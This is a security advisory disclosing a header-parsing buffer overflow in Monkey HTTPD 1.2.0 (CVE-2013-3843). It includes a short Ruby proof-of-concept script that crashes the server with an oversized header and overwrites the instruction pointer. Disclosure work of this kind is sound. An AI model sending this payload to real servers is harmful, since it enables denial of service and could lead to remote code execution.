CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution

1. Title

   CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
   Vulnerability With Possible Arbitrary Code Execution

2. Introduction

   Monkey is a lightweight and powerful web server for
   GNU/Linux.

   It has been designed to be very scalable with low memory
   and CPU consumption, the perfect solution for embedded
   devices. Made for ARM, x86 and x64.

3. Abstract

   A specially crafted request sent to the Monkey HTTPD
   server triggers a buffer overflow which can be used to
   control the flow of execution.

4. Report Timeline

   2013-05-29
   Discovered vulnerability via fuzzing
   2013-05-30
   Vendor Notification

5. Status

   Published

6. Affected Products

   Monkey HTTPD <= 1.2.0

7. Exploitation Technique

   Remote

8. Details

   Improper bounds checking while parsing headers allows
   for an attacker to craft a request that will trigger a
   buffer overflow during a call to memcpy() on line 268
   in the file, mk_request.c.

9. Proof of Concept

   The vulnerability can be exploited by remote attacker
   without any special privileges. Under Ubuntu 13.04,
   an offset of 2511 lines up the instruction pointer
   with, 0x42424242.

   #!/usr/bin/env ruby

   require "socket"

   host = "localhost"
   port = 2001

   s = TCPSocket.open(host, port)

   buf = "GET / HTTP/1.1\r\n"
   buf << "Host: " + "\r\n"
   buf << "localhost\r\n"
   buf << "Bad: "
   buf << "A" * 2511
   buf << "B" * 4

   s.puts(buf)

10. Solution

There is currently no solution.

11. Risk

Risk should be considered high since it can be shown that
the flow of execution can be controlled by an attacker.

12. References

http://bugs.monkey-project.com/ticket/182

13. Credits

Doug Prostko <dougtko[at]gmail[dot]com>
Vulnerability discovery